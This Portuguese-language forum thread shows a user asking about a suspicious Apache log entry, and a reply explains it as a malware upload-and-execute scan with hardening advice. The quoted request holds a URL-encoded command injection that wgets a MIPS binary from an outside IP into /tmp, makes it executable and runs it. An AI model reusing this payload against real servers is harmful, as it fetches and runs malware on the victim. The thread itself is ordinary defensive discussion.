Log suspeito no apache! [RESOLVIDO]

1. Log suspeito no apache! [RESOLVIDO]

RecScreeN
recscreen123

(usa Linux Mint)

Enviado em 23/07/2018 - 03:57h

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.


  


2. MELHOR RESPOSTA

Paulo Bonfanti
pbonfanti

(usa Debian)

Enviado em 23/07/2018 - 08:46h

recscreen123 escreveu:

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.


Escaneamento verificando se é possivel fazer upload de algum malware e executar no seu servidor, pode ser um "shellshock atack". Aqui tem uma matéria em inglês demonstrando o ataque:

http://rajsadayeshellshock.blogspot.com/2016/11/shellshock-attack-using-metasploit.html

Atualize pacotes, bloqueie o IP e faça "hardening" do sistema.
E o aplicativo "lynis" citado na matéria acima é bastante útil.

https://www.tecmint.com/apache-security-tips/






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts